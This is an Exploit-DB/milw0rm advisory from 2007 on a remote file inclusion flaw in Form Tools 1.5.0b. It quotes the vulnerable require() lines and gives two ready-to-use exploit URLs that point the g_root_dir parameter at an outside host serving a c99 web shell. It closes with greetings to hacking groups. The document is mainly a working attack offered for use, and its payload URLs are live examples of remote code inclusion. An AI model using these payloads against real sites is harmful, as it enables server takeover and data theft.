Form Tools 1.5.0b - Multiple Remote File Inclusions

EDB-ID:

4736




Platform:

PHP

Date:

2007-12-14


# Name : Form tools 1.5.0b Remote File Include
# Download From : http://www.formtools.org/download.php
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In Files admin_page_open.php & client_page_open.php In Line 3 :
<?php
    require("$g_root_dir/global/templates/admin_nav.php");
    ?>
<?php
    require("$g_root_dir/global/templates/client_nav.php");
    ?>
 

# Exploit:
www.RxH.com/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://no-hack.fr/shells/c99.txt?
And Here
www.RxH.com/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://no-hack.fr/shells/c99.txt?
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
H-T TeaM (no-hack.fr)
Str0ck
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# milw0rm.com [2007-12-14]